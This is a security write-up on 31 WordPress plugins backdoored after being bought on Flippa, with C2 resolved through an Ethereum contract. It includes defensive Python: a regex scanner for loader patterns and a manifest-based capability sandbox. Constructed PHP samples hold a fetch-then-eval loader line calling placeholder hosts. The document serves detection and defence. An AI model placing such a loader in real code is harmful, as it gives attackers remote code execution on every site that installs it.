WordPress: 31 Plugins Backdoored via Flippa Acquisition

An attacker legally purchased 31 WordPress plugins on Flippa, inserted a dormant backdoor, and waited 8 months before activating it. The command-and-control domain was resolved through an Ethereum smart contract — making the C2 layer blockchain-mutable and resistant to standard DNS-level takedown. Because plugins run with full database and filesystem access by default, activation gave the attacker unrestricted host access across all affected sites. 96% of recent WordPress CVEs trace to plugins.
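A defender-side way to look for the loader shape described above (a hard-coded activation date, a C2 address obtained through an Ethereum JSON-RPC call, and fetch-then-eval) is a static scan of the plugin sources already installed on a host. The Python below is an added example, not code from the report or from any of the affected plugins; the rules are heuristic assumptions about what such a loader tends to look like in PHP, and both plugin sources are constructed samples with placeholder hostnames and contract address.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import Path

# Constructed sample plugin sources (not real plugins). BENIGN_PLUGIN is an
# ordinary option-saving plugin; SUSPECT_PLUGIN sketches the loader shape
# described in the write-up: a hard-coded activation date, a C2 address
# obtained through an Ethereum JSON-RPC eth_call, and fetch-then-eval.
# Hostnames and the contract address are placeholders, not real values.
BENIGN_PLUGIN = """<?php
/* Plugin Name: Example Settings (constructed sample) */
add_action('admin_init', function () {
    update_option('example_setting', sanitize_text_field($_POST['v'] ?? ''));
});
"""

SUSPECT_PLUGIN = """<?php
/* Plugin Name: Example Gallery (constructed sample) */
if (time() > 1767225600) {  // dormant until a hard-coded future date
    $body = json_encode(['jsonrpc' => '2.0', 'method' => 'eth_call', 'params' => [], 'id' => 1]);
    $resp = wp_remote_post('https://RPC_ENDPOINT_PLACEHOLDER', ['body' => $body]);
    $c2 = wp_remote_retrieve_body($resp);
    eval(base64_decode(wp_remote_retrieve_body(wp_remote_get($c2))));
}
"""


@dataclass
class Finding:
    rule: str
    line: int
    text: str


# Heuristic indicators (assumptions for this example, not signatures taken
# from the report). Each one alone is common in legitimate plugins, which is
# why risk_score() only scores combinations.
RULES = {
    "dynamic-code-execution": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "encoded-payload": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "blockchain-rpc-lookup": re.compile(r"['\"]eth_(call|getStorageAt|getLogs)['\"]"),
    "time-gated-activation": re.compile(r"\btime\s*\(\s*\)\s*[<>]=?\s*\d{9,}"),
    "remote-fetch": re.compile(
        r"\b(wp_remote_(get|post|request)|curl_exec|file_get_contents\s*\(\s*['\"]https?:)", re.I
    ),
}


def scan_source(source: str) -> list[Finding]:
    """Return every rule hit in a PHP source, with the line it was found on."""
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append(Finding(name, lineno, line.strip()))
    return findings


def risk_score(findings: list[Finding]) -> int:
    """Score 0-100: remote fetch feeding dynamic execution is the loader core;
    a chain-resolved address and a time gate each raise it further."""
    rules = {f.rule for f in findings}
    score = 0
    if "dynamic-code-execution" in rules and "remote-fetch" in rules:
        score += 50
    if "blockchain-rpc-lookup" in rules:
        score += 30
    if "time-gated-activation" in rules:
        score += 15
    if "encoded-payload" in rules and "dynamic-code-execution" in rules:
        score += 5
    return min(score, 100)


def scan_directory(root: Path) -> dict[str, int]:
    """Highest risk score per plugin folder under a wp-content/plugins directory."""
    scores: dict[str, int] = {}
    for php in root.rglob("*.php"):
        plugin = php.relative_to(root).parts[0]
        score = risk_score(scan_source(php.read_text(errors="replace")))
        scores[plugin] = max(scores.get(plugin, 0), score)
    return scores


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_PLUGIN), ("suspect", SUSPECT_PLUGIN)):
        hits = scan_source(src)
        print(f"{label}: score={risk_score(hits)}")
        for f in hits:
            print(f"  line {f.line} [{f.rule}] {f.text}")
```

Because the malicious code in this case arrived as an update months after the plugin was bought, a one-off scan is not enough: record the per-plugin scores as a baseline at install time and re-run the scan on every plugin update, treating any jump in score as a review trigger rather than waiting for a CVE that, as the next section notes, will never come for a legitimate acquisition.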

Why It Matters

No CVE can prevent a legitimate acquisition. Plugin-trust models based on marketplace reputation cannot defend against this class of dormant supply-chain attack. Cloudflare's new MIT-licensed Mdash project responds with per-plugin manifest-declared capability sandboxing — the structural countermeasure the WordPress architecture lacks.
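What manifest-declared capability sandboxing buys a host, shown as an added Python example rather than in Mdash's or WordPress's own code: the manifest format, the capability names, and the mapping from PHP API calls to capabilities are all assumptions made for illustration. Two checks fall out of the idea. At install or update time the host compares what the manifest declares with what the code actually calls and refuses the plugin on any mismatch; at runtime a gate refuses host calls the manifest never granted, so a dormant backdoor that later needs the network or dynamic code execution fails no matter when it wakes up. A manifest diff on update also makes a change of intent visible: an owner who wants new capabilities has to ask for them in writing.

```python
from __future__ import annotations

import json
import re
from typing import Callable

# Hypothetical manifest format used for this example (an assumption, not the
# schema of Mdash or of any WordPress API): a plugin lists the capabilities it
# needs, and the host refuses anything else.
CAPABILITY_OF_CALL = {
    "wp_remote_get": "network:outbound",
    "wp_remote_post": "network:outbound",
    "wp_remote_request": "network:outbound",
    "curl_exec": "network:outbound",
    "file_put_contents": "fs:write",
    "unlink": "fs:write",
    "file_get_contents": "fs:read",
    "get_option": "db:read",
    "update_option": "db:write",
    "eval": "code:dynamic",
    "create_function": "code:dynamic",
}
NEVER_GRANTABLE = {"code:dynamic"}  # no manifest may request this
CALL_RE = re.compile(r"\b([A-Za-z_][A-Za-z0-9_]*)\s*\(")

# Constructed samples. The settings plugin declares exactly what it uses. The
# gallery plugin's pre-sale manifest (V1) only read the database; the post-sale
# update (V2) asks for the network and its code also executes what it fetched.
SETTINGS_MANIFEST = json.dumps({"name": "example-settings", "capabilities": ["db:read", "db:write"]})
SETTINGS_SOURCE = """<?php
add_action('admin_init', function () {
    $v = get_option('example_setting');
    update_option('example_setting', sanitize_text_field($_POST['v'] ?? $v));
});
"""
GALLERY_MANIFEST_V1 = json.dumps({"name": "example-gallery", "capabilities": ["db:read"]})
GALLERY_MANIFEST_V2 = json.dumps({"name": "example-gallery", "capabilities": ["db:read", "network:outbound"]})
GALLERY_SOURCE_V2 = """<?php
$c2 = wp_remote_retrieve_body(wp_remote_get('https://C2_PLACEHOLDER'));
eval(base64_decode($c2));
"""


def used_capabilities(source: str) -> set[str]:
    """Infer capabilities from the API calls present in plugin source (by name, statically)."""
    return {CAPABILITY_OF_CALL[n] for n in CALL_RE.findall(source) if n in CAPABILITY_OF_CALL}


def check_manifest(manifest_json: str, source: str) -> dict:
    """Install-time check: declared versus actually used capabilities; fail closed on mismatch."""
    manifest = json.loads(manifest_json)
    declared = set(manifest.get("capabilities", []))
    used = used_capabilities(source)
    verdict = {
        "plugin": manifest.get("name"),
        "undeclared": sorted(used - declared),
        "forbidden": sorted((used | declared) & NEVER_GRANTABLE),
        "unused_declared": sorted(declared - used),
    }
    verdict["allowed"] = not verdict["undeclared"] and not verdict["forbidden"]
    return verdict


def new_capabilities(old_manifest_json: str, new_manifest_json: str) -> list[str]:
    """Update-time check: capabilities the new version requests that the installed one never had."""
    old = set(json.loads(old_manifest_json).get("capabilities", []))
    new = set(json.loads(new_manifest_json).get("capabilities", []))
    return sorted(new - old)


class CapabilityGate:
    """Runtime side of the same policy: every privileged host call passes through here."""

    def __init__(self, manifest_json: str):
        self.declared = set(json.loads(manifest_json).get("capabilities", []))

    def call(self, capability: str, fn: Callable, *args, **kwargs):
        if capability in NEVER_GRANTABLE or capability not in self.declared:
            raise PermissionError(f"{capability} not granted by manifest")
        return fn(*args, **kwargs)


def gate_allows(manifest_json: str, capability: str) -> bool:
    """True if the runtime gate lets a call needing `capability` through."""
    try:
        CapabilityGate(manifest_json).call(capability, lambda: None)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    print(check_manifest(SETTINGS_MANIFEST, SETTINGS_SOURCE))
    print(check_manifest(GALLERY_MANIFEST_V2, GALLERY_SOURCE_V2))
    print("update requests:", new_capabilities(GALLERY_MANIFEST_V1, GALLERY_MANIFEST_V2))
    print("V1 gate allows network:", gate_allows(GALLERY_MANIFEST_V1, "network:outbound"))
```

The static check is a name-based approximation and can be evaded by indirect calls, so the runtime gate is the real boundary; the static check earns its keep as an early, reviewable signal. Under this model the eight-month dormancy described above stops mattering: the backdoor's first attempt to reach the network or run fetched code hits a gate configured from the manifest, not from marketplace reputation.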